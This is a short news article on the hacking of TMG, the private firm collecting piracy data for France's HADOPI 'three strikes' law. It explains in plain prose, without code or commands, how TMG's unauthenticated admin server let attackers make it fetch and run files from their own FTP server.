The French “three strikes” policy has been put on hold after the private outfit, which was supposed to collect piracy data, was hacked.
TMG’s data-collecting software was examined by the hackers and its anti-piracy software was found to be riddled with flaws.
The server was running a custom-written administration program coded in Delphi. It had the novel security innovation of not requiring any authentication at all. After all, a big server containing details on file sharers is never going to be a target for hackers, is it?
Anyone connecting to port 8500 could send commands to the server. True, there were limited commands the hackers could use. Shutdown or reboot the computer, stop or start a peer-to-peer client, and update the software on the server. What could a hacker possibly do with those?
According to Ars Technica the update command connects to an FTP server, retrieves a file, and then executes it and rather than connecting to a specific FTP server, it allows the server to be specified when the update command is given.
The attacker can set up their own FTP server, put their malicious program onto it and then tell the TMG system to update from the hacker-controlled server.
It means that the private networks used by TMG for sharing IP address information with the French authorities can also be attacked.
But the problem is that the dodgy network is the key to running the French “three strikes” anti-piracy law.
The HADOPI agency, which enforces the law, has only allowed TMG, to collect the IP address data. If it can’t then then the three strikes law is toast.